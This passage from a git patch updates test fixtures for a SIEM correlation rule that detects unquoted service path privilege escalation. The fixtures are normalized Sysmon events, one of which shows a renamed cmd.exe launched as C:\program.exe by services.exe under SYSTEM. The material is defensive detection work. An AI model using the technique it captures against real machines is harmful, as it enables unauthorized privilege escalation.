Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "subject.process.name": "consent.exe", "subject.process.original_name": "consent.exe", "subject.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "subject.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.parent.guid": "20fff121-f3f8-647d-1300-000000003900", "subject.process.parent.id": "368", "subject.process.parent.name": "svchost.exe", "subject.process.parent.path": "c:\\windows\\system32\\", "subject.process.path": "c:\\windows\\system32\\", "subject.process.version": "10.0.17763.3232 (WinBuild.160101.0800)"}
+
From ce7ec2039d08da73a84965e9ac9665cd67df69aa Mon Sep 17 00:00:00 2001
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Wed, 2 Aug 2023 11:51:25 +0300
Subject: [PATCH 54/57] =?UTF-8?q?=20=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20=20=20(Unquoted=5FService=5FPath=5FAbuse)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../tests/test_1.sc | 92 ++++++++++++++++++-
 .../tests/test_2.sc | 6 +-
 .../tests/test_3.sc | 5 +-
 3 files changed, 92 insertions(+), 11 deletions(-)
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_1.sc
index 1da2f4da..c5fadb6c 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_1.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_1.sc
@@ -1,6 +1,90 @@
-# Здесь укажи какие нормализованные события (одно или несколько) ты подаёшь на вход правилу корреляции.
-# События отделяются друг от друга символом новой строки. Каждое их них должно быть записано в строку.
-{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0807172Z\"},\"EventRecordID\":\"27636\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - Potential Unquoted Service Exploit\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.317\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010e7880100}\"},{\"Name\":\"ProcessId\",\"text\":\"2856\"},{\"Name\":\"Image\",\"text\":\"C:\\\\program.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.592 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"Cmd.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"c:\\\\Program Files\\\\vulnsvc\\\\mmm.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - Potential Unquoted Service Exploit", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "c:\\Program Files\\vulnsvc\\mmm.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010e7880100", 
"object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "2856", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "program.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\", "object.process.version": "10.0.17763.592 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.317Z", "type": "raw", "uuid": "cfe86c74-2c29-4618-8dbf-fb8a14b34f3a" }
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:21:19.6296306Z\"},\"EventRecordID\":\"28173\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:21:19.623\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7df-5ea4-0000-001080711800}\"},{\"Name\":\"ProcessId\",\"text\":\"1396\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b7df-5ea4-0000-001080711800", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1396", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.501Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:21:19.623Z", "type": "raw", "uuid": "560e565a-3e77-4652-9f0d-dbbccea434fa"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:21:19.3400272Z\"},\"EventRecordID\":\"28169\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:21:19.335\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7df-5ea4-0000-001052671800}\"},{\"Name\":\"ProcessId\",\"text\":\"992\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k NetworkService -p -s WinRM\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k NetworkService -p -s WinRM", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b7df-5ea4-0000-001052671800", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "992", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.501Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:21:19.335Z", "type": "raw", "uuid": "a944f8a0-b923-4b47-9e25-4cb757f6a567"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:21:18.4123163Z\"},\"EventRecordID\":\"28154\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:21:18.407\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7de-5ea4-0000-0010fa4e1800}\"},{\"Name\":\"ProcessId\",\"text\":\"6548\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k NetworkService -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k NetworkService -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b7de-5ea4-0000-0010fa4e1800", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "6548", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:21:18.407Z", "type": "raw", "uuid": "8033c5af-59af-440f-9932-35ef8bac1647"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:21:08.5643502Z\"},\"EventRecordID\":\"28134\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:21:08.560\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7d4-5ea4-0000-0010e09b1700}\"},{\"Name\":\"ProcessId\",\"text\":\"2792\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b7d4-5ea4-0000-0010e09b1700", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2792", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:21:08.560Z", "type": "raw", "uuid": "69b82445-374f-4bda-b188-506981bd842e"}
+{"action": "start", "body": 
